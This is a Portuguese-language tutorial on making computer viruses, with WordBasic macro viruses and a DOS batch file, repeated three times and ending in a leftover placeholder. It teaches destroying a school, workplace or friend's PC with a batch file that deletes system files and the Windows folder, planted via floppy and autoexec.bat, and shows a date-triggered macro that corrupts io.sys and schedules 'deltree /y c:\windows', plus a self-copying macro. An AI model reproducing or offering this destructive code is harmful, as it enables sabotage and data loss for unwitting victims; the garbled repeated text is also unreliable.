Sub MAIN
MacroCopiar “Global:Inocu”, “DocumentoNovo”, 0
End sub

Vírus Fagundes Varela

Sub MAIN
InícioDocumento
Inserir “Lembra dessas noites”
Inserir CHR$(13)
Inserir “Cheias de doce harmonia,” aaa Inserir CHR$(13)
Inserir “Quando a floresta gemia” aa aaa Inserir CHR$(13)
Inserir “Do vento aos brandos açoites?”
Inserir CHR$(13)
Inserir CHR$(13)
Inserir “Quando as estrelas sorriam” aaa Inserir CHR$(13)
Inserir “Quando as campinas tremiam”
Inserir CHR$(13)
Inserir “Nas dobras do úmido véu?” aaa Inserir CHR$(13)
Inserir “E nossas almas unidas”
Inserir CHR$(13)
Inserir “Estreitavam-se, sentidas,” aaa Inserir CHR$(13)
Inserir “Ao brilhar daquele céu?” aaaArquivoImprimirPadrão
End Sub

Tutorial Como fazer seu próprio Vírus

Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)
Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:
copy con arquivo.bat

@echo off

@echo frase de sua preferência

del*.sys

del*.exe

del*.com

cd windows

del*.*

del arquivo.bat

@echo frase de sua preferência

Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.
Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.
Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe.

VEJA UM EXEMPLO DE VIRUS DE MACRO QUE ADULTERA A IMPRESSÃO.

Vírus 12/04
Sub MAIN
If Dia(Agora()) = 12 and Mês(Agora()) = 04 Then
DefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”
Close #1
End if
Open “c:\autoexec.bat” For Output As #1
Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”
Close #1
End Sub

ROTINA 2

Sub MAIN
Open “C:\imaiden.txt” for Output As #1”
Print #1 “Código em hexadecimal”
Print #1 “Código em hexadecimal” ‘(continuação)...
Close #1
Shell “debug texto.txt”
Shell “c:\imaiden.com”
End Sub

ROTINA 3

Sub MAIN
MacroCopiar “Global:Inocu”, “DocumentoNovo”, 0
End sub

Vírus Fagundes Varela

Sub MAIN
InícioDocumento
Inserir “Lembra dessas noites”
Inserir CHR$(13)
Inserir “Cheias de doce harmonia,” aaa Inserir CHR$(13)
Inserir “Quando a floresta gemia” aa aaa Inserir CHR$(13)
Inserir “Do vento aos brandos açoites?”
Inserir CHR$(13)
Inserir CHR$(13)
Inserir “Quando as estrelas sorriam” aaa Inserir CHR$(13)
Inserir “Quando as campinas tremiam”
Inserir CHR$(13)
Inserir “Nas dobras do úmido véu?” aaa Inserir CHR$(13)
Inserir “E nossas almas unidas”
Inserir CHR$(13)
Inserir “Estreitavam-se, sentidas,” aaa Inserir CHR$(13)
Inserir “Ao brilhar daquele céu?” aaaArquivoImprimirPadrão
End Sub

Tutorial Como fazer seu próprio Vírus

Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)
Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:
copy con arquivo.bat

@echo off

@echo frase de sua preferência

del*.sys

del*.exe

del*.com

cd windows

del*.*

del arquivo.bat

@echo frase de sua preferência

Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.
Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.
Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe.

VEJA UM EXEMPLO DE VIRUS DE MACRO QUE ADULTERA A IMPRESSÃO.

Vírus 12/04
Sub MAIN
If Dia(Agora()) = 12 and Mês(Agora()) = 04 Then
DefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”
Close #1
End if
Open “c:\autoexec.bat” For Output As #1
Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”
Close #1
End Sub

ROTINA 2

Sub MAIN
Open “C:\imaiden.txt” for Output As #1”
Print #1 “Código em hexadecimal”
Print #1 “Código em hexadecimal” ‘(continuação)...
Close #1
Shell “debug texto.txt”
Shell “c:\imaiden.com”
End Sub

ROTINA 3

Sub MAIN
MacroCopiar “Global:Inocu”, “DocumentoNovo”, 0
End sub

Vírus Fagundes Varela

Sub MAIN
InícioDocumento
Inserir “Lembra dessas noites”
Inserir CHR$(13)
Inserir “Cheias de doce harmonia,” aaa Inserir CHR$(13)
Inserir “Quando a floresta gemia” aa aaa Inserir CHR$(13)
Inserir “Do vento aos brandos açoites?”
Inserir CHR$(13)
Inserir CHR$(13)
Inserir “Quando as estrelas sorriam” aaa Inserir CHR$(13)
Inserir “Quando as campinas tremiam”
Inserir CHR$(13)
Inserir “Nas dobras do úmido véu?” aaa Inserir CHR$(13)
Inserir “E nossas almas unidas”
Inserir CHR$(13)
Inserir “Estreitavam-se, sentidas,” aaa Inserir CHR$(13)
Inserir “Ao brilhar daquele céu?” aaaArquivoImprimirPadrão
End Sub
DESCRIÇÃO-AQUI.